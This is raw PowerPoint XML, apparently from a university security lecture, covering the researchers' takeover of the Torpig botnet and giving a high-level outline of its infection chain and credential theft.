                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="102"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="113" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="102"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="114" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="102"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="115" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="102"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="116" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="117" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="118" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="104"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="119" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="104"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="120" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="121" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="105"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="122" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="105"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="123" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="124" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="107"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="125" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="107"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="126" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="127" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="108"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="128" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="108"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="129" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="130" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="110"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="131" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="110"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="132" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="133" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="111"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="134" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="111"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="135" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="136" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="115"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="137" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="115"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="138" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="139" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="116"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="140" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="116"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="141" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="142" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="117"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="143" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="117"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="144" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="145" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="118"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="146" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="118"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>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nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="150" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="123"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="151" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="123"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="152" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="123"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="153" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="123"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="154" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="155" presetID="42" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="156" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="126"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="157" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="126"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="158" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="126"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="159" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="126"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+.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42" presetClass="entr" presetSubtype="0" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="163" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="129"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="164" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="129"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="165" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="129"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="166" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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6" grpId="0"/>
      <p:bldP spid="86" grpId="1"/>
      <p:bldP spid="10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Botnet is My Botnet”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1600200"/>
            <a:ext cx="9829800" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Takeover of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Torpig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> botnet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Random domain generation + fast flux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Team reverse engineered domain generation algorithm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Registered 30 days of domains before the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>botmaster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Full control of the botnet for 10 days</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Goal of the botnet: credential theft and phishing spam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Steals credit card numbers, bank accounts, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Researchers gathered all this data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="110994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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18"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20301"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Torpig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="D:\Classes\CS 4700\assets\torp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952" y="2388967"/>
            <a:ext cx="11635199" cy="37719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6135" y="1548458"/>
            <a:ext cx="2120301" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Attacker places a redirect on the vulnerable server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3838896" y="1811665"/>
            <a:ext cx="1534887" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Rootkit installation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8852143" y="1988955"/>
            <a:ext cx="1534887" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Trojan installation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9619586" y="3563940"/>
            <a:ext cx="2187221" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Collect stolen data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8549306" y="6123878"/>
            <a:ext cx="3257501" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Capture banking passwords</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="9042112" y="758667"/>
            <a:ext cx="2689836" cy="1042813"/>
            <a:chOff x="1219200" y="4876799"/>
            <a:chExt cx="5181605" cy="1384995"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangular Callout 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219200" y="4876799"/>
              <a:ext cx="5181599" cy="1384995"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -29443"/>
                <a:gd name="adj2" fmla="val 266904"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="DA1F28"/>
            </a:solidFill>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="DA1F28">
                  <a:lumMod val="50000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" kern="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tw Cen MT"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="TextBox 16"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219206" y="4928315"/>
              <a:ext cx="5181599" cy="1267182"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
